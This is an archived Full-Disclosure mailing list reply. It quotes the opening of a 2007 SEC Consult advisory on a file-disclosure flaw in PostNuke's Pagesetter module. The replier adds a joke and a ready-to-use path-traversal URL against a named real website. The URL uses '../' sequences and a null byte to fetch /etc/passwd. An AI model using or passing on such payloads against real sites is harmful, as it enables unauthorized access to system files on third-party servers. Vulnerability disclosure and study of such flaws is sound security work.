[Full-disclosure] SEC Consult SA-20070226-0 :: File Disclosure in Pagesetter for PostNuke
Matthew Flaschen
matthew.flaschen at gatech.edu
Tue Feb 27 09:02:05 GMT 2007
research at sec-consult.com wrote:
> SEC Consult Security Advisory 20070226-0
> =======================================================================
> title: File Disclosure in Pagesetter for PostNuke
> program: Pagesetter page creation module
> vulnerable version: 6.2.0
> 6.3.0 beta 5
> impact: high
> homepage: http://www.elfisk.dk
> found: 2006-11-21
> by: D. Matscheko / SEC-CONSULT /
> www.sec-consult.com
> =======================================================================
>
> vendor description:
> ---------------
>
> Pagesetter is a publishing module that allows the PostNuke users to
> create web pages from structured data, with the data structure and
> output templates defined by the PostNuke administrator.
>
> [Source: http://www.elfisk.dk]
>
I think brendanb's going to be busy.
http://www.nesco.com.au/index.php?module=Pagesetter&type=file&func=preview&id=../../../../../../../../../etc/passwd%00
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 254 bytes
Desc: OpenPGP digital signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070227/2336be37/attachment.bin
Full-Disclosure is hosted and sponsored by Secunia.